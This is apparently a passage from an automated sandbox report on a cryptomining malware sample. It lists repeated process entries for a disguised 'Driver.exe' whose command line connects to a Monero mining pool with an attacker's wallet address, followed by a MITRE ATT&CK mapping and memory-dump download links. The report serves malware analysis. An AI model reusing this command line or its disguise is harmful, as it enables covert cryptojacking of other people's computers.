      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1160
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:2012
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1416
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:832
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1164
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:240
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:320
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1072
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1920
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:756
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:980
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1988
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1868
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:240
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:360
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1160
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:240
- - C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C13D.tmp\C13E.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1340

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-153-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1216-147-0x0000000075D90000-0x0000000075F2D000-memory.dmp

Filesize
1.6MB

Download
memory/1216-142-0x0000000075530000-0x0000000075542000-memory.dmp

Filesize
72KB

Download
memory/1216-120-0x0000000075210000-0x0000000075227000-memory.dmp

Filesize
92KB

Download
memory/1216-119-0x0000000004D00000-0x0000000004D01000-memory.dmp

Filesize
4KB

Download
memory/1216-118-0x00000000763F0000-0x000000007703A000-memory.dmp

Filesize
12.3MB

Download
memory/1216-122-0x0000000075150000-0x00000000751A2000-memory.dmp

Filesize
328KB

Download
memory/1216-123-0x0000000077190000-0x00000000771C5000-memory.dmp

Filesize
212KB

Download
memory/1216-124-0x0000000075140000-0x000000007514D000-memory.dmp

Filesize
52KB

Download
memory/1216-115-0x0000000075250000-0x00000000752D0000-memory.dmp

Filesize
512KB

Download
memory/1216-113-0x0000000075C10000-0x0000000075C9F000-memory.dmp

Filesize
572KB

Download
memory/1216-125-0x00000000771E0000-0x00000000771F9000-memory.dmp

Filesize
100KB

Download
memory/1216-126-0x0000000074C30000-0x0000000074C7F000-memory.dmp

Filesize
316KB

Download
memory/1216-112-0x0000000000950000-0x00000000009B2000-memory.dmp

Filesize
392KB

Download
memory/1216-106-0x0000000077200000-0x000000007735C000-memory.dmp

Filesize
1.4MB

Download
memory/1216-109-0x0000000000950000-0x00000000009B2000-memory.dmp

Filesize
392KB

Download
memory/1216-130-0x0000000074CB0000-0x0000000074CCC000-memory.dmp

Filesize
112KB

Download
memory/1216-127-0x0000000074CD0000-0x0000000074D28000-memory.dmp

Filesize
352KB

Download
memory/1216-128-0x00000000753A0000-0x00000000753AC000-memory.dmp

Filesize
48KB

Download
memory/1216-146-0x0000000075530000-0x0000000075542000-memory.dmp

Filesize
72KB

Download
memory/1216-145-0x0000000074120000-0x000000007412E000-memory.dmp

Filesize
56KB

Download
memory/1216-144-0x0000000074130000-0x0000000074145000-memory.dmp

Filesize
84KB

Download
memory/1216-143-0x0000000075D90000-0x0000000075F2D000-memory.dmp

Filesize
1.6MB

Download
memory/1216-131-0x0000000077040000-0x0000000077067000-memory.dmp

Filesize
156KB

Download
memory/1216-121-0x0000000075110000-0x0000000075125000-memory.dmp

Filesize
84KB

Download
memory/1216-89-0x0000000000190000-0x00000000001D5000-memory.dmp

Filesize
276KB

Download
memory/1216-132-0x0000000074BC0000-0x0000000074C04000-memory.dmp

Filesize
272KB

Download
memory/1216-88-0x0000000077410000-0x0000000077467000-memory.dmp

Filesize
348KB

Download
memory/1216-87-0x0000000076110000-0x0000000076157000-memory.dmp

Filesize
284KB

Download
memory/1216-86-0x0000000075A40000-0x0000000075AEC000-memory.dmp

Filesize
688KB

Download
memory/1216-141-0x00000000751F0000-0x0000000075206000-memory.dmp

Filesize
88KB

Download
memory/1216-84-0x0000000000950000-0x00000000009B2000-memory.dmp

Filesize
392KB

Download
memory/1216-83-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1216-82-0x0000000074E30000-0x0000000074E7A000-memory.dmp

Filesize
296KB

Download
memory/1216-140-0x0000000074160000-0x000000007417C000-memory.dmp

Filesize
112KB

Download
memory/1216-139-0x0000000075950000-0x0000000075995000-memory.dmp

Filesize
276KB

Download
memory/1216-138-0x00000000741E0000-0x0000000074218000-memory.dmp

Filesize
224KB

Download
memory/1216-137-0x0000000074B30000-0x0000000074B47000-memory.dmp

Filesize
92KB

Download
memory/1216-136-0x0000000074B20000-0x0000000074B2B000-memory.dmp

Filesize
44KB

Download
memory/1216-135-0x0000000075AF0000-0x0000000075C0D000-memory.dmp

Filesize
1.1MB

Download
memory/1216-133-0x00000000741A0000-0x00000000741DD000-memory.dmp

Filesize
244KB

Download
memory/1216-134-0x0000000075550000-0x000000007555C000-memory.dmp

Filesize
48KB

Download
memory/1620-55-0x00000000763F1000-0x00000000763F3000-memory.dmp

Filesize
8KB

Download
memory/1692-63-0x000007FEFC031000-0x000007FEFC033000-memory.dmp

Filesize
8KB

Download
memory/1780-152-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/1780-108-0x0000000077200000-0x000000007735C000-memory.dmp

Filesize
1.4MB

Download
memory/1780-148-0x0000000070060000-0x0000000070155000-memory.dmp

Filesize
980KB

Download
memory/1780-117-0x00000000763F0000-0x000000007703A000-memory.dmp

Filesize
12.3MB

Download
memory/1780-116-0x0000000075250000-0x00000000752D0000-memory.dmp

Filesize
512KB

Download
memory/1780-114-0x0000000075C10000-0x0000000075C9F000-memory.dmp

Filesize
572KB

Download
memory/1780-111-0x00000000013B0000-0x000000000180B000-memory.dmp

Filesize
4.4MB

Download
memory/1780-98-0x00000000013B0000-0x000000000180B000-memory.dmp

Filesize
4.4MB

Download
memory/1780-110-0x00000000013B0000-0x000000000180B000-memory.dmp

Filesize
4.4MB

Download
memory/1780-97-0x0000000074E30000-0x0000000074E7A000-memory.dmp

Filesize
296KB

Download
memory/1780-107-0x0000000000280000-0x00000000002C5000-memory.dmp

Filesize
276KB

Download
memory/1780-103-0x0000000077410000-0x0000000077467000-memory.dmp

Filesize
348KB

Download
memory/1780-102-0x0000000076110000-0x0000000076157000-memory.dmp

Filesize
284KB

Download
memory/1780-101-0x0000000075A40000-0x0000000075AEC000-memory.dmp

Filesize
688KB

Download
memory/1780-99-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download